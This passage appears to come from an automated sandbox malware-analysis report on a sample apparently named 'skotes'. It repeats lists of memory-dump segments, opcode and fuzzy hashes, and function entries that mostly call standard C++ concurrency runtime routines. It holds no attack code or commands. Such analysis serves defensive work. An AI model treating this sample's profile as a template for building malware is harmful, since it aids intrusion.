                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AdjustPointer
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1740715915-0
                                                                                                                                                                    • Opcode ID: 623833170a98d19fbfa10af565a23a62d7772312b2eb1f31a4f22710ffa8cdf4
                                                                                                                                                                    • Instruction ID: a9b4e29f162009160be56977da022ac9dcd306b15bc42b54f213ea517531c127
                                                                                                                                                                    • Opcode Fuzzy Hash: 623833170a98d19fbfa10af565a23a62d7772312b2eb1f31a4f22710ffa8cdf4
                                                                                                                                                                    • Instruction Fuzzy Hash: 72510276601B06AFEB299F54D881BBA73A7EF10700F14452DE80787392E771ED81CB90
                                                                                                                                                                    Function 00644C15 Relevance: 6.1, APIs: 4, Instructions: 141COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: EqualOffsetTypeids
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1707706676-0
                                                                                                                                                                    • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                                                                                    • Instruction ID: 362742ebbc8931d34a7b4c4158b670fd461602863a3b8dd1a4ebb0d6d4cafd95
                                                                                                                                                                    • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                                                                                    • Instruction Fuzzy Hash: B5519A79E0420A9FDF11CF68C4827EEBBF6EF15354F14449AE851A7351DB32AA05CB90
                                                                                                                                                                    Function 00612EC0 Relevance: 6.1, APIs: 4, Instructions: 132threadCOMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3264154886-0
                                                                                                                                                                    • Opcode ID: ecaeb31c20f5eef69e79d66ebe3171ea01a2c75a3b94b5b43acdd96673c1b9cc
                                                                                                                                                                    • Instruction ID: b05e445d7983a9ba584b35b702ca5844bf7fec8879de3b23396cffd2d758e1eb
                                                                                                                                                                    • Opcode Fuzzy Hash: ecaeb31c20f5eef69e79d66ebe3171ea01a2c75a3b94b5b43acdd96673c1b9cc
                                                                                                                                                                    • Instruction Fuzzy Hash: 8041DFB0901A269FDB20DF64D944B9AB7F9FF18320F14452DE816D7740EB31EA45CB81
                                                                                                                                                                    Function 0063DB30 Relevance: 6.1, APIs: 4, Instructions: 123COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0063DB64
                                                                                                                                                                      • Part of subcall function 00638F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00638F50
                                                                                                                                                                    • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0063DBC3
                                                                                                                                                                    • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0063DBE9
                                                                                                                                                                    • Concurrency::location::_Assign.LIBCMT ref: 0063DC56
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384129731.0000000000901000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384176428.0000000000903000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384197388.0000000000904000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384236784.0000000000909000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384276090.000000000090B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384317353.0000000000918000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384354809.0000000000919000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_6_2_610000_skotes.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1091748018-0
                                                                                                                                                                    • Opcode ID: 60c4dba9b6ca72e82cd7e518daf6af63ac03f4e7d9985c8f377c060d24131089
                                                                                                                                                                    • Instruction ID: def81f036387915fd7ce5f15963b6e59ec03030115edf39c04e2b6c4878d9b15
                                                                                                                                                                    • Opcode Fuzzy Hash: 60c4dba9b6ca72e82cd7e518daf6af63ac03f4e7d9985c8f377c060d24131089
                                                                                                                                                                    • Instruction Fuzzy Hash: 7441F270700214ABDF19AB24D896BBEBB7BAF45310F04409DE5069B3C2CBB4AD45CBD5
                                                                                                                                                                    Function 006356AF Relevance: 6.1, APIs: 4, Instructions: 117COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _InternalDeleteHelper.LIBCONCRT ref: 006356F2
                                                                                                                                                                    • _InternalDeleteHelper.LIBCONCRT ref: 00635726
                                                                                                                                                                    • Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 0063578B
                                                                                                                                                                    • SafeRWList.LIBCONCRT ref: 0063579A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000006.00000002.3380170791.0000000000611000.00000040.00000001.01000000.00000007.sdmp, Offset: 00610000, based on PE: true
                                                                                                                                                                    • Associated: 00000006.00000002.3380071723.0000000000610000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380170791.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380551481.0000000000679000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380639626.000000000067B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380716683.0000000000685000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380817293.0000000000686000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3380906503.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381354663.00000000007DD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381469497.00000000007E0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381552894.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381695825.0000000000800000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381778158.0000000000801000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381846199.0000000000802000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3381939760.0000000000803000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382119598.000000000080E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382240516.000000000080F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382319889.0000000000810000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382394515.0000000000812000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382482520.000000000082C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382540800.000000000082E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382621872.000000000082F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382687096.0000000000830000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382752221.0000000000837000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382815338.0000000000841000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382910219.000000000085E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3382949661.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383013206.0000000000860000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383157139.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383316521.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383390501.000000000086C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383468207.0000000000879000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383505709.000000000087B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383557411.000000000087C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383623379.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383677747.0000000000888000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383715340.0000000000890000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383770746.0000000000897000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383832437.0000000000899000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3383974699.00000000008C9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000006.00000002.3384027465.00000000008CA000.00000040.00000001.01000000.00000007.sdmpDownload File
